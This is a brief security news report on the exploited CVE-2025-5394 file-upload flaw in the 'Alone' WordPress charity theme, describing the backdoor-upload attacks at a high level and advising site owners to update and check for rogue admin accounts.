Hackers Exploit Critical Vulnerability in WordPress Plugin

Hackers are exploiting a critical vulnerability in the "Alone – Charity Multipurpose Non-profit WordPress Theme," identified as CVE-2025-5394, which has a high-risk score of 9.8. Discovered by security expert Thái An, this flaw allows unauthorized file uploads due to a missing security check in the "alone_import_pack_install_plugin()" function. This vulnerability affects all plugin versions up to 7.8.3, with a fix provided in version 7.8.5, released on June 16, 2025.

Wordfence's István Márton explains that the flaw enables remote code execution, leading to potential full website control by attackers. Hackers began exploiting this vulnerability on July 12, prior to its public disclosure, indicating they were monitoring code updates for new vulnerabilities. Wordfence has blocked 120,900 exploitation attempts, originating from specific IP addresses.

The attacks typically involve uploading a ZIP file containing a PHP backdoor, allowing further command execution and file uploads. Hackers also install file managers and backdoors to create fake admin accounts. To mitigate risks, website owners should update to the latest theme version, monitor for unusual admin accounts, and check logs for suspicious activity related to the vulnerable function.

Stay secure — stay Wavasec. 🔐